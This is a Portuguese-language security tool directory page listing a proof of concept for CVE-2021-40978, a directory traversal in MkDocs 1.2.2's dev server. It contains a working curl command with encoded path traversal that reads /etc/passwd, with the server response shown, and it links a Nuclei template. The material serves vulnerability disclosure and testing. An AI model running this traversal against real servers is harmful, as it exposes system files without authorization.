Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2021-40978 — Prova de conceito para navegação de diretório no servidor de desenvolvimento integrado do MkDocs 1.2.2, permitindo leitura arbitrária de arquivos através de navegação de caminho codificada. Inclui exemplos de curl e templates Nuclei. | Kitploit
Ferramentas/GitHubGitHub/nisdn/cve-2021-40978
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesTestes de Penetração
GitHubnisdn/cve-2021-40978

CVE-2021-40978

Prova de conceito para navegação de diretório no servidor de desenvolvimento integrado do MkDocs 1.2.2, permitindo leitura arbitrária de arquivos através de navegação de caminho codificada. Inclui exemplos de curl e templates Nuclei.

Ver Repositório
21há 4 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2021-40978

Exploração de directory traversal no servidor de desenvolvimento integrado do mkdocs

O Mkdocs 1.2.2 permite directory traversal através do servidor de desenvolvimento integrado que responde na porta 8000. Abaixo estão alguns exemplos de caminhos explorados com sucesso:

Impact

Usando esta técnica, é possível buscar arquivos fora do diretório raiz, permitindo que qualquer pessoa leia e baixe arquivos arbitrários.

image

Request:

image

Response:

image

Prova de Conceito

Modelo:

Nuclei
https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-40978.yaml
root@kitploit:~
curl http://0.0.0.0:8000/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd -i
HTTP/1.0 200 OK
Date: Mon, 04 Oct 2021 02:13:38 GMT
Server: WSGIServer/0.2 CPython/3.7.3
Content-Type: application/octet-stream
Content-Length: 2187

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync...

Screenshot_20211003_231812

Baixar ferramenta